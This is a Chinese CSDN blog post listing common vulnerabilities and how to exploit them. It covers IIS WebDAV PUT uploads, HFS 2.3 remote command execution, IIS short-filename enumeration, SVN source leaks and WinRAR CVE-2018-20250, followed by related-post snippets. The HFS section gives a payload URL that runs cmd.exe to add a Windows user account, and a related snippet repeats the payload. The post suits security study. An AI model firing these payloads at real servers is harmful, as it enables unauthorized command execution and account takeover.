一些主流漏洞利用

最新推荐文章于 2024-07-04 22:03:43 发布
最新推荐文章于 2024-07-04 22:03:43 发布
阅读量336 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cou1d/article/details/115521312
版权

python java linux mysql 安全

一些主流漏洞利用

1.IIS漏洞put漏洞

IIS 6.0开启了WebDAV并且拥有IIS来宾用户拥有写入权限

利用

使用iispus工具进行后门上传;

参考:https://www.cnblogs.com/linuxsec/articles/11915496.html

2.HFS(Http文件服务器)远程命令执行漏洞
漏洞版本:

HFS2.3c之前版本;HFS2.3x版本

描述

HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的’findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的’%00’序列利用该漏洞执行任意程序。

利用

攻击载荷:

http://127.0.0.1:8080/?search=={.exec|cmd.exe /c [Command-String].}

例子:http://127.0.0.1:8080/?search=={.exec|cmd.exe /c net user test1234 1234 /add.}

漏洞检测python代码:

https://www.abotaku.cn/archives/108.html

3.IIS短文件漏洞利用
描述

意义:
1、 猜解后台地址
2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。
3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。
局限性:
1、 只能猜解前六位,以及扩展名的前三位。
2、 名称较短的文件是没有相应的短文件名的。
3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。

利用

IIS短文件暴力枚举漏洞利用工具

https://github.com/lijiejie/IIS_shortname_Scanner

详细资料:

https://www.freebuf.com/articles/web/172561.html

4.SVN源码泄露漏洞
描述

概要:
   在使用SVN管理本地代码过程中,会自动生成一个.svn隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使隐藏文件夹被暴露于外网环境,

危害:
追踪的网站文件,逐步摸清站点结构。
利用此漏洞,可以下载整套网站的源代码。

xxxx/.svn/xx

检测工具

https://github.com/LangziFun/scan-backup-langzi-https://github.com/kost/dvcs-ripperhttp://www.nxadmin.com/tools/1236.html

利用工具

svnExploit https://github.com/admintony/svnExploit

6.

ThinkPHP5.x远程执行漏洞
phpadmin个版本漏洞
MS17-017永恒之蓝win7漏洞

7.winrar远程执行漏洞

(CVE-2018-20250)

相关软件版本:

WinRAR < 5.70 Beta 1
Bandizip< = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩< = 4.0.0.1170

复现:

https://blog.csdn.net/DarkHQ/article/details/88682390

y0um
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
主流安全大漏洞:隐私空间泄密
android_squad的专栏
11-03 2127
目前很多安全软件都提供了隐私空间、文件保险箱之类的功能。这类功能对于用户来说还是很实用的。因为,现在一般用户会在智能手机上保存各种照片、视频、文件等隐私文件。不过一旦手机丢失,隐私文件就很可能泄露出去。但是这些功能到底有多安全呢?经过我们研究,所有主流安全软件都存在漏洞,隐私数据会泄密。 市面上常用的安全软件将需要保护的文件分为图片、视频和普通文件。用户可以进行添加、还原等操作。对于图片、视
总结-各种安全漏洞学习环境集合
a1324622751的专栏
09-02 1960
在平时工作生活以及学习中,遇到了各种安全漏洞实验环境。本着方便自己方便他人的思想,我简单的将其收集一些。可能不全面,后续还会继续补充,希望能帮助初学安全的人,能为其提供一个好的动手环境。 1.upload-labs:一个包含各种上传漏洞的实验环境。 2.natas:一个闯关类安全游戏 3.DVWA:OWASP十大漏洞实验环境 4.vulhub:一个专门的漏洞实验环境,包含各种复杂漏洞...
Metasploit常用漏洞利用命令
qq_43623470的博客
01-11 1492
Metasploit常用漏洞利用命令(1) search&lt; name &gt; 用指定关键字搜索可利用漏洞 use &lt; exploit name &gt; 使用漏洞 show options 显示选项 set &lt; option name &gt; &lt; option &gt; 设置选项 show payloads 显示装置 Metasploit常用漏洞利用命令(2) sh...
漏洞利用-(HFS-RCE远程命令执行)
最新发布
my的博客
07-04 1203
概念验证是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。
搭建漏洞环境,学习常见漏洞的利用手段与防御方法
李熠专用博客_白帽子一枚,人称低危终结者
09-10 796
对于初学者,如果想要进一步学习如何利用与防御各种常见漏洞,自己搭建一个漏洞环境,可以更快地复现漏洞,还可以学习如何防御。市面上的漏洞环境很多,DVWA就是其中一个非常著名的,也非常流行的一款漏洞平台。本文将带你一步一步搭建DVWA平台。 本文除了教你如何搭建DVWA平台外,还会给你提供一个强大的虚拟机,该虚拟机集成了各种漏洞平台供你研究和使用。 DVWA安装 为了照顾使用不同系统的小伙伴,我会同时介绍Windows和Linux两个不同操作系统下的DVWA的安装。 Windows下的DVWA的安装 Lin
网站渗透测试之常见漏洞排行
网站安全专家
01-07 1429
我们SINE安全在进行Web渗透测试中网站漏洞利用率最高的前五个漏洞。常见漏洞包括注入漏洞、文件上传漏洞、文件包含漏洞、命令执行漏洞、代码执行漏洞、跨站点脚本(XSS)漏洞、SSRF漏洞、XML外部实体(XXE)漏洞、反序列化漏洞、解析漏洞等。,因为这些安全漏洞可能被黑客利用,从而影响业务。以下每一条路线都是一种安全风险。黑客可以通过一系列的攻击手段发现目标的安全弱点。如果安全漏洞被成功利用,目标将被黑客控制,威胁目标资产或正常功能的使用,最终导致业务受到影响。 常见的WebTOP5漏洞描述如下.
内核漏洞的利用与防范
08-06
《内核漏洞的利用与防范》涵盖了开发可靠和有效的内核级别漏洞利用所需的理论技术和方法,并将其应用于主流操作系统——UNIX衍生系统、MacOSX和Windows。本书分4个部分共9个章。第一部分介绍了漏洞利用的目标、内核...
2022年最常被利用的十大漏洞
qq_44005305的博客
03-07 276
福利:[网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!](黑客攻击变得一年比一年高级和复杂,因此现在追踪了解安全漏洞比以往任何时候都来得重要。本文着重介绍了2022年恶意威胁分子利用的一些最危险的漏洞。CVE-2022-30190(非正式名称为“Follina”)在2022年5月被披露,它是微软Windows支持诊断工具(MSDT)中的一个远程代码执行漏洞,允许远程攻击者在目标系统上执行任意shell命令。
为什么主流网站无法捕获 XSS 漏洞?
weixin_33985507的博客
04-22 114
2019独角兽企业重金招聘Python工程师标准>>> ...
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
漏洞利用原理(高级)
wk19951125的博客
08-28 221
SEHOPSEHOP原理攻击返回地址攻击虚函数利用未启用SEHOP的模块伪造S.E.H链表参考文献 SEHOP原理 开启SEHOP: 下载http://go.microsoft.com/?linkid=9646972的补丁,此补丁适于Windows’ 7和Windows Vista SP1。 手工在注册表中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\C...
安全漏洞概念及分类
热门推荐
maoji的专栏
10-12 3万+
本文是一个安全漏洞相关的科普,介绍安全漏洞的概念认识,漏洞在几个维度上的分类及实例展示。 安全漏洞及相关的概念 本节介绍什么是安全漏洞及相关的概况。 安全漏洞的定义 我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞的定义,基本上会发现高大上的学术界和讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5727
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS的远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3270
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFS: HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 1782
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
18-csrf漏洞及ssrf漏洞
qq_56414082的博客
03-27 578
跨站请求攻击,简单地说,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。比如: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6329
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
Android系统漏洞利用缓解技术详解 漏洞研究攻防实例分析.pdf
同时,还有一些技术的设计初衷是在发生漏洞利用时,及时检测并阻止攻击。 本章还介绍了一些主要的缓解技术的分类。其中一种技术是随机化技术,通过改变系统和应用程序的布局,增加攻击者发现漏洞的难度。另一种技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值